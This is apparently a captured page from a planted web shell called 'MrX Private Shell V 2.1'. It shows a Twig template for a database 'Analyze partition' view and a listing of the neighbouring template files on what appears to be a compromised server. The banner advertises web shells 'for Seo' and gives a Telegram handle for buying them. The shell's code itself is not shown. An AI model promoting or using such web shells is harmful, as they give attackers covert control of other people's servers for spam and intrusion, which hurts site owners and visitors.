__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="container-fluid">
<h2>{% trans 'Analyze partition' %}</h2>
{{ message|raw }}
{% for name, table in rows %}
<div class="card mb-3">
<div class="card-header">{{ name }} ({{ partition_name }})</div>
<ul class="list-group list-group-flush">
{% for row in table %}
<li class="list-group-item">
{% if row.Op|lower != 'analyze' %}
<span class="badge bg-secondary text-dark">{{ row.Op|title }}</span>
{% endif %}
{% set badge_variation %}
{%- if row.Msg_type|lower == 'error' -%}
bg-danger
{%- elseif row.Msg_type|lower == 'warning' -%}
bg-warning
{%- elseif row.Msg_type|lower == 'info' or row.Msg_type|lower == 'note' -%}
bg-info
{%- else -%}
bg-secondary
{%- endif -%}
{% endset %}
<span class="badge {{ badge_variation }} text-dark">{{ row.Msg_type|title }}</span>
{{ row.Msg_text }}
</li>
{% endfor %}
</ul>
</div>
{% endfor %}
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| analyze.twig | File | 1.11 KB | 0644 |
|
| check.twig | File | 1.11 KB | 0644 |
|
| drop.twig | File | 98 B | 0644 |
|
| optimize.twig | File | 1.11 KB | 0644 |
|
| rebuild.twig | File | 101 B | 0644 |
|
| repair.twig | File | 1.11 KB | 0644 |
|
| truncate.twig | File | 102 B | 0644 |
|